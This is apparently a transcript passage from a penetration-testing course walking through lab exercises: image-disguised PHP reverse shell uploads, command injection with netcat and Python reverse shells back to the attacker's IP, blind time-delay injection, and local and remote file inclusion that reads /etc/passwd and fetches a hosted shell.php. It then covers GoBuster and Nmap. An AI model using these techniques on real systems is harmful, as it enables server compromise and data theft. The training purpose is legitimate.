so should work like that. If we send it, it says that it worked. So let's go see if we can find that. Here's the GIF. It says it didn't work. That's not surprising because it's not actually an image. We need our other PHP shell. Here's our GIF with our PHP in it. So let's try and pass in the same parameter, equals who am I, and if we send this, it tells us this GIF works, and it cannot execute the command within the file. Let's try and just delete this and see if we can get a who am I this way. We'll send that, come back, refresh, check out this PHP, and it tells us we're www data. So it does let us inject a command with a GIF, but for some reason I wasn't able to get the web shell to work. But there's another way to go about this. So this would be a really roundabout way to do this. You could come in and we could try and upload like a Python shell in here, or because we know we have PHP, we could put inside of here, we could put inside of our command right here, instead of doing a system who am I, we could come to this web shell and we could execute a PHP reverse shell like this. But you saw us use this recently. Let's just try and upload this PHP shell and see if we can get this to execute a reverse shell for us. So we'll come back over here. We can edit this again. We'll put in our PHP reverse shell. We can open. We'll need to catch this inside repeater. Turn our interceptor on, submit, and send over to repeater. We can turn this off, come to repeater, tells us we have an invalid file, which we expect. We have the shell.php, and we'll just use the one with the PNG because we know that it's going to work for us. So we can come over here and we can just highlight this, paste in the PNG. Now, if we send this, it tells us that this worked. We can set up a netcat listener over here. Netcat, and I think we originally made that on port 4444. and now that's listening. So now when we open up that file, it should execute on the server, and it will give us a shell back. We can see our PHP file, we can see the size has changed. So we open this up and it's hanging, and we have a shell return back to us, and it's going to tell us I am www.data. So that is file upload. So there's a bunch of different ways you can play with this. If you have Hack the Box, I would recommend coming into Popcorn, because you have a lot of different ways to play with this. You have the JPEG and the GIF, the PNG, and so you can just come in here and play around with these and see all the different ways you can get a reverse shell from a file upload. And I would recommend, because we were not able to get the GIF web shell to work, you could play around with that and see if you could get a web shell rather than just executing commands one at a time, and then maybe see if you can get a reverse shell from the web shell, because there will be times that you have to do that inside of CTFs. But in the world of bug bounty, you really wouldn't be trying to get a reverse shell. You could just simply do a web shell and a who am I for a proof of concept. And file uploads are something you're going to see, so you can read about those in Hack the Box. And I would definitely recommend going out to Google and continuing your research on file uploads. But like I said, there's really not a lot of places to practice file upload, and it's because if there's a file upload that is going to be vulnerable on a server, you can get remote code execution. And for this reason, Hack the Box is really the only place that is really good for file upload. TryHackMe has a little bit of file upload, but I don't think it's as good as Hack the Box when it comes to practicing this specific vulnerability. TryHackMe is really great in other areas, but Hack the Box is really good for file upload. So with that, I will see you in the next vulnerability. All right, welcome to the section on command injection. This is probably going to be one of the most severe vulnerabilities that you will ever come across. This vulnerability gives you the opportunity to execute commands on the server and get information back, and possibly even get a shell on the server. So this is one of the most severe vulnerabilities that you will probably come across, because you can just compromise the server and all of the information on it. And if you're in a penetration test, then you can try and move around within the network. So let's go ahead and dive into command injection. Okay, we are going to be talking a little bit about command injection, and there's not really a whole lot of places to practice command injection that I know of. Really, it's just TryHackMe and then PortSwigger, which we'll come to here in a little bit in practice on. So with command injection, what we are able to do is put commands into the server, and then it tell us back. It'll give us the information back for whatever we sent the command in for. So if we send a who am I command, it will tell us who we're running as on the server. And so it says here, a command injection vulnerability is also known as remote code execution, because an attacker can trick the application into executing a series of payloads that they provide without direct access to the machine. So this might sound a little confusing, but it's going to make a lot of sense here in just a second. And so their example here is the who am I command. And I'm going to go ahead and launch this box. And then once it is loaded, I will bring you back. Okay, so this is now loaded up and ready for us to practice some command injection. But before we do, I want to show you kind of what is happening. If we come over to a terminal here, and the first thing I want to do is copy this to make sure we know what kind of commands to send through to the server. But really, you could just put in an who am I, and you could probably figure it out by that. But we can also type in ping and then the IP address that we just copied, and then you can hit enter, and we see that the TTL is 61. So we know that this is going to be a Linux server that we are up against. So now it tells us to use this handy web application to test the availability of a device by entering its IP address, and it's just going to go out and reach to an IP address. So a way to test this is to see if we wanted to check our device. We could come over here and set this up, and my IP address is up here, so we could say 10.2.42.96 and execute and see if we can get it to reach out. And it sent a ping out to our box, and it did not connect. but it pinged our box. So this is just sending a ping. It's not actually trying to connect. So what we can do with this now is you can just type in 127.0.1 and you can execute it, and it's going to tell us, it's going to give us back another ping of the box. And I guess I didn't need to ping it because it tells us right here it's going to be a Linux box. So some of the things we can do, I actually played around with this. That's why you can see these in here. I wanted to see all the different commands that it actually let me send. So I wasn't just sitting here testing everything for the first time. So here's a couple of the command injections that you're going to need to know. If you come in here and we type in 127.0.1, you can do an and sign like this. 0.0.0.1, we can put in an and sign just like this, and then we can do a who am I, and it'll execute. And you can see that it says we are www data, but we still get this ping right here. And it is possible in the coming lessons that we just don't want to see all of this ping right here. So what you can actually do is just put in a bunch of mumbo jumbo, and then you can use a double pipe and do the who and then do the who am I, and it skips the ping and we get the www data. But if we run this command right here and we don't double pipe it, you only do one pipe. Oh, it still works. Okay, I was going to say that it doesn't work, but it worked for us. So we still get the www data. So sometimes it won't work with one pipe, and you'll want to send through two pipes, and then sometimes you'll also have to have like a pipe afterwards and run it, and that time it doesn't work for us. So you will, in the wild, just have to play around with this. So we get the who am I, and it tells us we're www data, and you can type in ID and see how we're sending commands through. So if we come back over here and I type in ID, you can see we get this back. So we're actually communicating with the server, and this would be a very, very bad thing in the real world. So there's one more thing I wanted to show you, and that is this ping right here. If you were doing a blind command injection and you wanted to know if you could reach the server but you weren't getting any information back, you could run the regular whatever's up here. Sometimes it's not going to be something like this. You're not going to be pinging a server. It'll usually be a parameter with an equal sign, and then you'll put a command in over here. But you can ping, and the -C with the 10 is going to tell it to delay 10 seconds. So we'll actually put in 5 seconds so we don't have to wait quite so long. And it's going to ping itself. So if you watch down here, we have the seconds, and we'll hit it when it hits 10 seconds and wait for it and see if it comes back in 5 seconds. If so, then that works, and it did. So we pinged it, and that's how you do a time delay, which we're going to see in just a little bit. You can also run these with this and sign right here. There will be times that you'll need to try this, and you can actually, if you're getting stuck on command injection, what you can do is go out to Google and just type in command injection bypass and just look for different windows, command injection bypass. Maybe you'll have to do some URL encoding or something of that nature, and you can just bypass whatever filters they have. So you can also do with this, you can do two and signs just like this, and it should still work for us. And we'll send that over and see if it takes 5 seconds and it comes back. And then I want to try one more thing. I actually have not tried this yet, but because this didn't reach back on our netcat, I want to try this again. We'll set up a netcat listener, and we're going to set it up on port 4000 and see if we can actually get this to connect back to us. So if we do this right here, we can do our pipe. We'll actually do a double pipe, and then hopefully we have netcat available, and we can type in our IP address for it to connect back to. So 10.2.42.96, and then -E, and then we'll go bin bash, and then we can execute this and see if it reaches back. It doesn't look like it's going to because I did not type in the port. So we'll highlight this. We need to put a port in here, and I think I did 4000. Execute. It was port 4000, and it did not reach out. So maybe this doesn't work. We'll try one more time and then we'll move on. And I want to show you one other thing you can try with this. So netcat doesn't work, didn't reach out to us. So one thing you can also do in this command injection, like if you were going to capture the flag, one thing I would do is I would come in here and I would type which Python and see if we could get a Python reverse shell. And we can close out of that. And let's do something like this so we can get just what we want back. And we don't have any output. Let's see. So this box might not let us get a reverse shell on it. So I guess we're not gonna be able to figure out what kind of Python's on here, but this would be command injection in a nutshell. And I'm guessing we have Python 3. So we could try to get a reverse shell with Python. So you could come to Google and we would type in Python reverse shell. We can try Pentest Monkey, and we could try this right here. So we can set up our netcat listener. We'll go port 444. And we can type something in here. We got bin. I want bin bash. What do we have over here? And it's possible that this won't work either. And I would suggest typing something out like this in a text editor. Save some time. 0.96. And make sure this says we need Python 3 execute, and we get a shell back over here. So now if we say who am I, we are on the box, and if we type in ID, it'll tell us who we are. So you can get a reverse shell this way rather than just be sitting over here with command injection. And sorry, I kind of fumbled around there. I actually didn't try that before we did this little video here. So this is command injection in a nutshell. This is a great place to practice. So if you have a subscription to Try Hack Me, this is a really good place to come over here and practice your command injection. But if you don't, there's also a free way to practice command injection, and we're going to practice it here in just a second on PortSwigger. So let's go ahead and I'm going to get things set up, and we will start command injection over here in PortSwigger. If you would like to go ahead and open up PortSwigger and get this set up so you can follow along or try them on your own, then you can do that. Okay, so here we are at PortSwigger and we are on the OS command injection. We're going to do these first three right here because they're pretty easy, and I believe you had to have Burp Pro for this, and so we're not going to do these ones down here. But the first three of these are actually pretty easy, and you should be able to, I think, solve them. I think you probably could solve all three on your own, but for sure you should be able to solve these first two. So we'll go ahead and open this up. And it tells us this lab contains an OS command injection vulnerability in the product ID checker. The application executes the shell containing the user supplied product store ID. So we've seen stuff like this in the past. So we'll access this lab. And it tells us we are not solved because we haven't done anything. So when we have finished this should say solved up here. So we can see what Burp is doing. It's doing nothing. It's not hooked up. So down here in the check stock, like we've been doing and following the instructions right here in the product stock checker, we can forward that. We're going to check stock, forward, and right here is what we need. Send that to repeater. We can turn that off. And now we have the product ID and the store ID, and this is going to be where the command injection is at. So if you would like to try and solve this command injection by yourself, I would go ahead and give you this challenge. We have found the location, and I think you can figure it out. It's right here. You should try and see if you can figure out some of the command injection commands that you just saw previously, and give it a shot. But if not, here we go. So we have this product ID right here of 1. And what we were doing in some of the last ones was we were able to put this and sign in here. But because of the location of the command injection in this post request, we're not going to be able to use those. We will have to use a pipe. And so you can type in a pipe right here and do something like a who am I? And we can send this and see what happens. And it tells us who we are. So that probably right there solved this for us, and it did. But while we're here, let's play around with this. Let's see what happens if we do 2 pipes and we send this. It does nothing. What happens if we do 2 pipes at the end and send it? Nothing comes back. What happens if we just do 1 and 1? And this is just something that I would encourage you to do as you come across things like this. So we actually have it come back with a pipe at the end and the beginning. What happens if we change this to very clearly a product ID we don't have and it still works? What happens if the product ID is wrong and we have 2 pipes and we send it? Nothing. Now, what about this store ID right here? What if we try 2 pipes and we go, who am I? It gives us a syntax error. What about 2 pipes? And we send it. It gives us the same thing. We can come over here and maybe we can say an ID. It tells us who we are. And so you can really just play around with this and see what happens. What if we put a crazy ID number in here? It still works. And then you can just mess around with this and see what works and what doesn't. If we check a who am I, syntax error, we could go which Python like we did before, and this is black because it needs to be URL encoded, which is a plus sign, and we don't get anything back. And I don't think that you're able to get remote code execution on this. So here we go. This would be your command injection right here. We're going to try and do another one on this lab right here. So if you would like to go ahead and open this up and read the instructions, then I would say go ahead and see if you can figure this out. I'm not going to read it just yet. I want you to go ahead and read this and try and figure it out on your own. And if you get stuck, then we'll go over it. Okay, so this says the lab contains a blind OS injection. So if you're familiar with the bug bounty for beginners course that I already have out, then we know that a blind injection means we're going to have to do some kind of time delay, and it's not going to tell us what's in the response. So we have a 10-second delay in order to solve this challenge, and it tells us that the vulnerability is in the feedback function. So with this, you can go ahead and open up the lab. And we have this submit feedback right here. And we can just type in a bunch of gibberish. And I think this is going to ask for some kind of ending for an email account. And we can come back and intercept this. Send it. We'll send this to a repeater. And it is possible that this took you much longer to figure out because we have a bunch of different parameters in here that we are testing against. So we have the name right here. So in a time delay, we saw this in the try hack me example that I showed you. You're going to try and do a ping against the server itself and wait for the time delay. So what we would do in a time delay command injection or a blind command injection with a time delay, you will type in ping, and then we have to URL encode it, and it will look just like we did previously. I'm going to do 5 seconds to start out so we don't have to wait. 27.0.0.1. And then if we send this, we'll see right here, this should be like 4,000 or 5,000 when it actually works. So we can try a pipe at the beginning, pipe at the end. We can try another pipe, and I see that I made a mistake. I didn't have the 1 in there, so we'll try this again and say go. Still not long enough. We can add in another one. Let's see if this works. And it doesn't seem like this is going to be our spot. Otherwise, one of these would work. We can't use the and sign in there, so we'll just move on to the next one. We'll say pipe, ping, and I have this, I fast forwarded typing this in so you didn't have to watch it again. So we got our pipe and our ping command. We can send this. We'll turn this proxy off. It's bothering me that it's flashing. We can see that the time did not work, so we can throw a pipe on the end, send it, not long enough. Let's try 2 pipes, and we can send it, and our time is much longer, and we can see that it was almost 5 seconds. So now to solve this, I believe we can type in a 10 right here and send it, and this should give us the solve because the 5 seconds was pretty close. So it's not solved, and it just came back and it tells us that it has solved. So this is a timed command injection or a blind command injection. This is how you would test it with a ping against the server itself and give it a time delay. So with that, we're going to move into the last one of our command injection labs. This one is going to be a lot harder. I think you can figure it out if you've done my bug bounty course and you've also gone through my free ethical hacking course, because the ethical hacking course is going to cover things that are kind of like this when you get into the actual penetration testing portion of that course. So if you've gone through both of those, I think you can solve this. If not, and you're pretty new, you're probably going to struggle with this one, but we'll go ahead and solve it anyway. So we'll open up the lab in a new window, and then we'll read what it says. So it has a vulnerability that is blind in the feedback function, just like we had before. The output is not returned in the response like before. However, you can use the output redirect to capture the output from the command. And it says that we have a writable folder. And then it tells us to solve the lab, we need to execute a whoami command and retrieve the output. So what we're going to end up having to do is send a whoami command to the server, and then we're going to have to save it in a file inside of this images directory. So it's going to be var www images and then the file with an output. So if you went through the ethical hacking course, I think you can solve this. If not, we'll go ahead and solve it together now. So I just had an idea. If you want to try this on your own, I can actually show you over here. We can make a directory and we'll call it test. We'll cd into test, cd to test. And then what we can do is if I type in who am I can send this command and I can put it in a file.txt. And now if I hit enter and then we'll ls, you can see this files here, and I cat out file.txt, it tells us that we are Kali, or if I gedit this file, it'll save the response in there. So we're basically going to be doing this right here inside of this directory right here. So what we're going to do is give a who am I like we did up here, only it's going to be in this right here. And so your command is going to look like this. And if it has to be URL encoded, you'll need plus signs right here. If not, you might be able just to delete this and do it with no space. And then you're going to need to try and retrieve the file with the command injection. And I want to see if you can figure this out. So go ahead and give it a try now that I have given you a hint with this clue right here. Okay, so let's go ahead and solve this challenge. It said it was in the feedback. So we'll come back to the proxy. We can come to submit feedback. We'll do the same thing we did before and just type in some mumbo jumbo at gmail.com and turn our proxy on. Submit feedback, send this to repeater, turn the proxy off. And so here we are at this same page we were at. I'm actually going to make sure that this is in the exact same, the command injection is in the exact same place, so we don't spend a bunch of time trying to send this somewhere that it's not. So we'll go ping So I wrote the ping command out so you didn't have to watch it. I sent it, and we'll see it was a 5-second delay. So the command injection is in the same place. So we should be able to come in here and say, who am I? And then we'll give our caret, and then we'll give it the location that we were supposed to give it right here. Paste that in, and then we'll say file.txt and send this and hope that it worked. And now I think the way to check this is going to be, we'll need, I think it'll be file, and then we'll want to read this file.txt. So we'll send this. Okay, since this right here isn't working, we're going to just go ahead and assume this is not going to be in the right directory. So what we can do with this right here is we know we had to send it into the var www, and then I think it was images, and then it was our output.txt, which is where and then it was our file.txt, which is where we put our command who am I, right? That's what it says. We do, yes, it's in the images. So what we're going to probably have to do at this point is find the images, because we're not able to pull anything from here. So what we'll do is go to the home page and see if we can pull an image somewhere around here. See, we have the products, we have the product ID, we have the image. Okay, so we right click the image and hit open image in new tab, and we have the image, and now we have a file name. I bet we can do this without burp, and then if we can't, we'll open it up in burp. So we'll type in file.txt, which is where we put the file, and it tells us who we are as the user. So that's one way to solve this challenge. It was a lot more, this one was a lot more difficult of a command injection. In the real world, you wouldn't do anything like this. The only time you're going to do something like this is in a CTF. Or if you were on a live pen test. In the real world in a bug bounty, what you would do is probably just send a ping with a time delay and then submit that, and you would stop right there. But because this is a CTF, it wanted us to grab this user right here, and this is where we did it. We saved it in images, and we needed the file name and the file.txt. So that is the last of the command injection that we're going to be covering, and we'll move on to the next vulnerability. Okay, welcome to the local file inclusion and the remote file inclusion, also known as LFI and RFI portion of this course. The LFI is going to be one that is more common than the RFI, and the LFI is going to give us the opportunity or the ability to read local files on the server, which could lead to a compromise of sensitive information or data that we're not supposed to be able to access, and files on the server that we should not be able to access. The RFI is going to give us the ability to host up our own files and then have the server reach out to our server that we make on our Kali machine and then execute that file, and will lead to remote code execution on the server. So we're going to jump into the LFI and the RFI now. Let's get started. Welcome to the LFI RFI, so the local file inclusion or the remote file inclusion portion of this course. We're going to be using TryHackMe for our example, and TryHackMe is just too good to pass up when it comes to practicing LFI and RFI. If you can afford a TryHackMe membership, then it is worth it just to come in here and practice your LFI and RFI along with other things. And when it comes to Hack the Box doesn't have any really good place to practice and RFI. So sadly, if you have only a Hack the Box membership, you're not going to be able to practice this. So what we have going on right here, this is a really great explanation. I'm really happy with how they have this all structured. So you have your basic web application right here. You have the HTTP, the URL, and then you have a get.php. And this PHP right here is going to be a giveaway of the way we're going to go about trying to pull this file down. So oftentimes you're not going to see a .php, but sometimes you will. And when you see a .php and then a file equals, just like this, you can try for an LFI. And we've already talked about directory traversal. And typically if something is vulnerable to a directory traversal, you are going to be able to pull down files as well. And once you have LFI, which is pretty bad, if you can turn that into remote file inclusion, then you have got something really, really big going on for you. So we have this URL is going to make a GET request to the server for a specific file, and it's going to equal the file that you click on. And I'm going to show this to you, and I think it will make a lot more sense. So I've already opened up the lab here. When we click on lab 1, it tells us it's got this lab1.php, and you can come in here and you can just type something in. So if we just type in anything, because we don't really want to look for a file just yet. Actually, I'll just show you this way. So if we come in here and we type in etc pass wd and we say include, it pulls it down for us, but this is not going to happen. That's not real world. So what will happen is something like this. You'll come to a page, it'll have like this request right here. You're searching for something and say it's a search bar, and we just type something in and we intercept this in our proxy and we hit include. We'll send this to our repeater. We can turn this off. And now what happens is it tells us, we'll just pretend all this isn't here because this is not going to happen in the real world, but this will happen right here. This file equals and then what we typed in. Now this looks like what we had going on over here, and this really does happen. And up here we can change this, and we can now put in this etc pass wd, and it will pull it down like this. And a lot of times you'll have this file equals up here and you can play around with it, but rather than using the URL, I would rather use burp. So we can come over here and we can say send. And I like that it tells us we have this Nginx server right here, and I'm sure if we ran like an nmap scan, it would tell us what we're up against completely, but we're not going to do that. We'll do that in just a minute with an LFI on a Hack the Box system, and we will test it there. But we have this file equals, and then we have right here where we can ask whatever file, we can ask for whatever file we want. So right here we can put in our etc pass wd, and we can send this. And on the page it tells us we have users here, and when you're looking for users you can look for the bin bash. That's going to tell us people who have actual users on this box. There's actually quite a few of them, or a bin sh, not a bin bash. We have root has a bin bash. So when you pull this down you can look for users, and it's even worse if you can access the etc shadow file, because then we can actually pull down password hashes, and we don't have the ability to do that. So this would be a file inclusion, and you can pull down all kinds of files from the server. So you can actually pull down, let's say we wanted to look at the index.php, you can send this and it'll pull down, I can't tell if that worked or not, because there's just a bunch of HTML. Let's render it, maybe we can see it. Yeah, so it just pulled down the home page like right here. So you can look at different pages in here. So let's say you were able to you were to do some kind of fuzzing on this page, and you were looking for different directories, and you had a directory that you weren't allowed to look at, like a hidden directory. In here you could probably include this in the file, and it will pull down that hidden page below right here. And because we're able to do this local file inclusion, when you have local file inclusion, it's a great vulnerability to find. It's one that it's a pretty severe vulnerability, but if you can turn this into a remote file inclusion, then it becomes something more. So right now we have what's called local file inclusion. We're able to get local files that are hosted on the target server. But if you're able to have remote file inclusion, that means we can include files from our box over here. So if you look at what we have in this file, we have a shell.php right here and a web shell over here. If I have remote file inclusion, I can have this GET request reach out to my server over here that I can host up, and I can host up this file right here, and it will go get that file and then execute it, and then I can have remote code execution on this server, and I will own this network. So what this looks like. An easy way to test for this, like if you were to do this in a bug bounty program and you were just looking for a proof of concept, you would just type in sudo python2 with a simple server, and then we would just put in our IP address and see if it reaches out to us. So we can go HTTP 10.2.42.96, and we can send this and see if we get a hit over here, and we do. So this means we can actually get remote code execution on this server. So what we can do now is close out of this. We'll rehost up those files, and I've already edited the shell.php, so you wouldn't have to watch me change the IP address right here. So it's all set up and ready. So we can host this back up. We can come over here and say netcat port 444. And if we send this right here, we want it to grab shell.php. And now if we send this, it's going to hang right here because we have a shell, and we could say, who am I? And it now tells us we are www data. So we now have code execution on this server. And this would be pretty much as bad as it gets. Now I want to show you a little more local file inclusion and how to read pages when they don't render over here when we ask for a specific file and we want to see what's happening. And I'm going to switch over to hack the box for this. All right, I have loaded up the box Poison here for us, and if you have a Hack the Box subscription, it would definitely be worth your time to open this up and play around with it so you can see if you're able to find any of these LFI files on your own. So we're going to go ahead and just play around with this for a little bit, and I want to show you some of the things you can do with LFIs that can really save you a lot of time, and if you're doing CTFs, help you find files that you shouldn't be able to access. So we're going to do the same thing we did before. We'll just put in some characters in here, and we're going to catch this over in our repeater. So we'll hit submit. We'll send this over to repeater, and then we can turn our interceptor off. And now you can see before we didn't have this file right here with the browse.php and then the file and then our request. So you can, like I showed earlier, try and get files right here like this, which is fine, but I like to use repeater just because it goes a lot faster. So we're going to go ahead and use repeater. So we'll hop over here, and if we send this, we get this simple message over here saying that it failed to find this through the inclusion, and it tells us the path we're using right here. So what we can do at this point is we can try and type in etc pass WD, and if we send this, we can see we have the etc pass WD file. You can see we have the etc pass WD file right here. And something to always look through is this server version. You can highlight this, copy it, go to Google, see if there's any vulnerabilities, and check that type of stuff out, especially when you're hunting for bug bounties as well as penetration tests. It's always worth looking at. And then we can see the users on here is going to be this one right here, and then we have root right here is a user. The rest of these don't look like they have the ability to log in. Now on to looking for more files. There's a really simple way to go through the files really quickly, and I've used the tool FUF a lot on my channel. So we're going to go ahead and we're going to use FUF, and I'm just going to leave this in here and delete this a little bit at a time. Actually, we'll just delete this whole thing. So we can delete this. What we'll need to do is highlight this and copy it, paste it into FUF, and then right here we're going to want to fuzz, but to make sure we make it all the way back to the root, I'm going to just put some of these dot slashes in here so that we can make sure we go all the way back to the root. And then we're going to fuzz, and we don't want to fuzz this with the web content. What we want to look for is the LFI content. So we can come back over here, and I think we just type in web. Nope, we don't want web shells. We want fuzzing right here, so we can type in fuzzing, and then we want LFI, which is right here. So we're going to go into that directory and see what's in here. And we'll use this one because we're up against a Linux box. We can just type in Linux. That did not work for me. We'll type in like that. And now if we run this, it should work for us, and it does, but we don't want all of that output. So we're going to filter by lines, and we're going to say if it has 5 lines, don't include it. And it's going to give us all the files that we're able to look at. Now, if I was actually doing a CTF, I would look through every single one of these to see what we can find. Now, obviously, we tried the Etsy Pass WD, but you can come through and check out all of these files and see if there's anything helpful for you to try and get remote code execution on the box. And because we don't have an RFI, which I have not actually tried, so we'll go ahead and try it and make sure that this does not work. And we can put my IP address in here, which is 10.10.14.6, and it doesn't hang, no RFI. So we aren't able to include any of our own files to get a shell back that way, but you could look through all of these and see if maybe you can find some credentials or something, or maybe be able to SSH into the box. But this is a quick, easy way to fuzz when you have an LFI. And in a real bug bounty situation, you wouldn't want to actually enumerate any of this. You would only do something like that on a CTF. You would really just test for an LFI like I've already shown you and make sure that it is there, and then you would submit a report. Or if you were testing for an RFI, you would just do what we did right here and set up a simple server and see if you can reach out to yourself for an RFI. And that is the remote file inclusion and the local file inclusion. You can go ahead and play with these if you have a Try Hack Me and a Hack the Box subscription, and get used to seeing these. You're going to see them a lot inside of CTFs, especially LFIs. RFIs are a lot more rare, but they do happen. So with that, we will move on to the next vulnerability. Okay, I have a few GitHub note pages that I found helpful when I was new to penetration testing that I think will be helpful for you. And sometimes I actually will remember, like, oh, I need this specific tool, I need this specific function, and I don't remember exactly the syntax on how to use it. And so I will still sometimes come back to these notes pages that somebody else made, and I will still use them. And I will show you in just a second. I actually came across a tool that I haven't used in several months, and I thought, man, I forgot that even existed. And I have used some of these tools before that I've forgotten about that have helped me get into specific networks. And so I'll show those to you here in a second. But just coming off of our Nmap scan, this is something that's really helpful when you're starting out. This tells us, this is our enumeration guide. This tells you how to enumerate all of these different ports that can come up on an Nmap scan. And some of the ports aren't in here, but Google will be your friend there. But this is really helpful. So if you see port 21 and you think, okay, I remember how to enumerate part of it, but I can't remember exactly how to enumerate the whole thing, you can come in here and it will take you to port 21, and it gives you an Nmap scan. And I think at the end, all you would have to change here is the IP address, and then you can fire it away. And you have your telnet, and you can come through, and there's just a ton of different ways to enumerate different ports. And what will happen is eventually you will have done this enumeration so many times that you won't be coming back here near as much, and you'll remember the syntax and you'll remember how to do these things. So when you scroll through here, it's going to look really daunting, and you're going to think there's no way I can remember all of this stuff, and that's okay. You don't have to remember it. You can just go through your Nmap scan and you'll see port 443 is open, which usually you'll have port 80 open too, or you'll see 135, 145, or sorry, 139, 140, or 45, sorry. I'm really struggling here. Port 135, and these are actually really common. And personally, I actually enumerate these more towards the end, and I might actually get in trouble for doing that by some people, but when you're doing a hack the box or a try hack me, And even on a lot of exams, these ports are dead ends. Now, I'm not going to say they always are because sometimes vulnerabilities will pop up here, or sometimes you'll have an anonymous login, or you'll be able to pull down usernames. But really, I usually enumerate these more towards the end. But you'll see these really, really common. Port 22 is really common. 111, you'll see 110. You will find this really helpful as you are going through and trying to enumerate ports on your in-map scans. Here's another one that I think is helpful. It tells you the methodology. It's basically the same as one we just saw over here with a little bit of help. So this will tell you, okay, when you find a port 80 open, what do you do? Well, you'll run your Nicto, your dirbuster, your gobuster. You'll have burp open, so you're pulling in all of those get requests and your post requests that you can go back and look through, and it'll tell you how to do some other enumeration, your in-map scan. This is what the other page told us, the different tools we can use to enumerate. This is the site. I actually was just scrolling through here and I came across, let's see if I can pull it up. This tool right here, oh, it was at the top, is one that I have used in the past. It will pull down all the common words on the web app and make you a password brute forcing list. And I actually forgot about this tool. I have not used it in several months, and so I don't usually come to these sites, but I pulled them up for you guys because I thought they'd be helpful, and I just saw this and I thought I should actually come back and read through these because I am sure I have forgotten more than just this one tool right here. And then finally, this website here, the OSCP Survival Guide, mostly gives you different attacks, and it actually will give you a lot of scripts and a lot of syntax on how to run specific tools and different commands in the command line. And so a lot of this stuff we're actually going to go over later. But it is helpful, and this is probably going to be the most overwhelming if you look through here. But trust me, a lot of this is you'll get used to seeing it, and it's not as daunting as it looks. And so this is probably the page you're going to use the least. But I thought I'd throw it in here just in case because you will have to clone things from GitHub. And so it's helpful to see this, to know that it's here, to know who is. We already went over some of this. And it just is a helpful page. You can look through it, read through it. This is the page I use the least. This is one that I just don't really refer to. And maybe eventually you guys will get to the point where you don't refer to these much anymore. But in the beginning, I think they'll be really helpful. So with that, we'll go ahead and I'll see you in the next lesson. Go ahead and use GoBuster for part of this course, especially as we're doing network testing, because I find that it's a little more helpful. It does a little more advanced enumeration than Derb, which I showed you earlier in this course. And so you can really use either one, whichever one is your preference, but also you can use Dirbuster. It's also really good, and it does basically the same things. The only difference is it has a graphical user interface, and it's more hands-on and being able to see what you're doing and clicking buttons. But the first thing we're going to have to do is we're going to have to install GoBuster because I don't believe it comes with Kali Linux. So you just type in your sudo apt-get install, and then you'll do a GoBuster like this. And I already have it installed. I'll go ahead and show you. Here it's installed. It'll take a few seconds. It should take maybe 30 seconds to install. And then we're going to give a look at how we use it and what exactly it does that's a little more helpful than using just Derb. So I have pulled up the script. Actually, I'm gonna delete this and I'm gonna show you like a helpful tip on what I like to do. We're still gonna have to have a -w, but we're also gonna have to switch directories. So one of the things I like to do, instead of having that huge path here to get to this word list, one of the things I really like to do is I like to go into my desktop. So CD over to your desktop and then make a directory. And I like to make one called lists. So this is where I'll keep all of my word lists, my brute forcing lists, my number lists, and all the different lists that you can think of. And we'll go ahead and copy that one that we just saw. So it'll be, we're going to copy, and I believe it's our user share. Okay, there was a lot in there. I think it's wordless. It is, it's wordless, and it will be under dirbuster. Did I mess something up? Yep, dirbuster directory, and then we'll go dash list. I got a U in there, dash list, and it should be 2.3, and it's our medium text. And then I will just say this as dirb.txt as the output. And I just realized that I'm going to be saving this into my desktop. So actually what we'll do is I'm going to run that CD into lists, and then I'm just going to tab up. And then if we ls, we now see we have this dirb.txt. So then when I run GoBuster, I will go ahead and I'm going to switch over here. And so you can see what this looks like. And I'll have GoBuster, and then it tells us we're going to be doing directory busting. This is our U for our URL. And then we have the IP address, which would be the domain name that we're going to be running this on. And I can actually go ahead and run the dirb.txt. And if I start this, it'll go ahead and it will start brute forcing, looking for different directories for us, begin doing enumeration on. But what I like to do with GoBuster that I think is a little more helpful is sometimes you will see a URL that will look like this, and it'll say login.aspx, or it'll say .php. And so this will tell us that we have PHP running, and so we might need to add a .php in order to pull up different directories and subdomains. So what I like to do is come over here, and the -x will tell us what extensions we want, and you can put PHP, and you can put ASPX, or you can put HTML, or whatever the site requires, and you can actually just add a whole bunch of these. And for every one of these that you add, though, it is going to take much longer. And so you have to be ready to go ahead and kick off this GoBuster scan, and just know if you're running a whole bunch of these extensions that it's going to take a while, and this actually will save you. Sometimes you'll be in a box, or even in some exams, they'll try and trip you up by adding in a login.php or an admin.php. And if you just run GoBuster and you don't have this extension, you will never find that page. And so this is something that you need to be aware of. We will run into this in this course. You will run into this in the future when you're out on your own. And sometimes you'll even come up against this in exams, or if someone's trying to do a box for an interview, they might throw this in there. So be prepared and know what you're looking for, and know that you can use this extension with GoBuster. We are going to begin doing a little more in-depth network scanning, as it's going to be needed going forward from this point. And so one of the most popular tools that is used is going to be Nmap. And this is a really helpful tool. I would say most every penetration tester will run this at the beginning of any test, or with any virtual machine or box that you are going to be testing against. And so this is the script I like to use. I want to walk through it real quick and then show you what output looks like. And then in the next video, I'm going to give you some notes that I use, that I found online when I was learning, and they've been really helpful, and I think they'll help you guys as well when you see the output that we get from the scan. But before that, let's go ahead and start. This is Nmap. This is the name of the tool. You can just type in Nmap and it will bring up the tool. You don't actually have to type anything else because it's in our path. And then also the T3 here. This is our speed that we want to run the scan. It runs at T3 normal. This is if you delete this, it is going to be running at the T3 speed. Some people like to speed it up and will run like a T4 or even a T5. I don't like to do this because sometimes it will miss ports or it will error out, and I just don't think that it's worth saving an extra two minutes for that. The dash A will run all of the different types of scans, which we're actually going to look at when we look at the nmap-help. The P-P runs all ports. I think there are 65,535 ports. The P-P will scan every port. You don't have to run this P or this dash PN, but I like to run it because sometimes I'll get errors on different ports, and what this does is if you don't have this in here, it will actually send out a ping to each port, and if it doesn't receive a signal back, it will go on to the next port. And so I like to have the dash PN in my scans because then it actually will scan the port no matter what. It takes longer, but this is my preference. And then also throw in your IP address that you're going to be scanning against. But I like the dash V. I actually just started using this a few months ago because it will actually put out the ports that it finds as it's scanning. So before I would run it without the dash V, and I'll just show you. We run it and we just sit here and we wait until we eventually finish the scan. And if we go ahead and we run this with the dash V, you'll see that as it is going, look, it's already found port 21 and port 80. Now I know port 21 is going to be FTP and this is going to be a web app, and I can go ahead and I can begin numeration on these different ports, and I don't have to wait for the scan to finish. And also forgot to mention that this dash A will do the OS detection as well as tell us more about the ports. It'll do some of the enumeration for us. And so when the scan is complete, it will look like this. And so it will tell us we have FTP. It'll tell us we have anonymous login, which means we're allowed to log into the FTP. And this tells us that we have HTTP port 80, and this is the software that it's running. So we could actually copy this, paste it. We can see if ExploitDB has anything against this, if there's any vulnerabilities against this software. And 